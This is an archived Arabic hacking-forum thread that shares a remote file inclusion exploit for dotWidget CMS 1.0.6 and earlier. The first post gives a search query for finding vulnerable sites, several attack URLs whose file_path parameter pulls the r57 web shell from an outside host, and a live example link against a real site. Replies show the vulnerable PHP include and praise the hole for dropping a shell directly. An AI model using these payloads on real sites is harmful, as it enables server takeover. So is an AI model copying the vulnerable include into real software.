dotWidget CMS <= 1.0.6 سحب شل على الموقع [الأرشيف]

مشاهدة النسخة كاملة : dotWidget CMS <= 1.0.6 سحب شل على الموقع

MazaGi

06-06-2006, 04:05

سلام عليكم

ابحث في قوقل
dotwidget Printer-friendly

الاستغلال
printfriendly.php?file_path=http://rst.void.ru/download/r57shell.txt?cmd
feedback.php?file_path=http://rst.void.ru/download/r57shell.txt?cmd
printfriendly.php?file_path=http://rst.void.ru/download/r57shell.txt?cmd

مثال
ارفس هنا (http://www.dotwidget.com/printfriendly.php?file_path=http://rst.void.ru/download/r57shell.txt?cmd)

G3n!u5

06-06-2006, 04:35

ثغرات ريموت انكليود بتكون قويه جدا ومؤثره

الخطا البرمجى اللى وقع فيه مبرمج هذا السكربت هوا

<?php
$file_path="/";
include($path.'printfriendly.php');
?>

تسلم ياغالى على الثغره

حليب السعوديه

06-06-2006, 04:37

والله مشكور يا اخ مزاجي و مشكور انك وضحت ان الغره لرفع شل مباشره
و بس يا ريت لو تذكر اسم المصدر في المره القادمه
المصدر : http://msgs.securepoint.com/cgi-bin/get/bugtraq0606/53.html
الخطوره : عاليه High Risk
اخوك حليب السعوديه